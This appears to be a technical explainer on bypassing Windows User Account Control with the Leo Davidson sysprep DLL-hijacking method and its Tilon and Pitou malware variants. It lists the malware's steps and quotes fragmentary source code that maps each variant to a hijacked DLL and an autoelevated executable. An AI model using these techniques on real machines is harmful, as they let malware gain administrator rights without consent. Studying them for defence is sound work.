Defeating UAC Using Sysprep and Tilon/Pitou

• 1 – Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
• 2 – Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
• 3 – Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;

​
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1   – Original Leo Davidson concept.
* UacMethodSysprep2   – Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon      – Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3   – Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe       – WinNT/Pitou derivative from Leo Davidson concept

Typical malware UAC bypass:

1. Creates a DLL in %temp%;
2. Inserts code into the running explorer.exe, and explorer.exe moves dll from %temp% to C:\Windows\System32\sysprep\cryptbase.dll;
3. C:\Windows\System32\sysprep\sysprep.exe is executed and sysprep.exe loads ;C:\Windows\System32\sysprep\cryptbase.dll with administrative privileges; and,
4. C:\Windows\System32\sysprep\cryptbase.dll executes malware with administrative privileges

1.
/* ucmMasqueradedRenameElementCOM
*
* Purpose:
*
* Rename file/directory autoelevated.
*/
2.
/*
* ucmMasqueradedCreateSubDirectoryCOM
*
* Purpose:
*
* Create directory autoelevated.
*
*/
3.
/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
*
*/
4.
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions
* Most of them are unknown, and list does not properly handled by system itself, use this fact.
*
*/
5. /* ucmStandardAutoElevation */

switch (Method) {

    case UacMethodSysprep1:

        //%temp%\cryptbase.dll
        _strcat(szSourceDll, CRYPTBASE_DLL);

        //%systemroot%\system32\sysprep      
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe    
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep2:

        //%temp\\shcore.dll
        _strcat(szSourceDll, SHCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep3:

        //%temp%\dbgcore.dll
        _strcat(szSourceDll, DBGCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodOobe:

        //%temp%\wdscore.dll
        _strcat(szSourceDll, WDSCORE_DLL);

        //%systemroot%\system32\oobe\”
        _strcat(szTargetDir, L”oobe\\”);

        //%systemroot%\system32\oobe\setupsqm.exe
        _strcat(szTargetProcess, SETUPSQM_EXE);

        break;

    case UacMethodTilon:

        //%temp%\ActionQueue.dll
        _strcat(szSourceDll, ACTIONQUEUE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;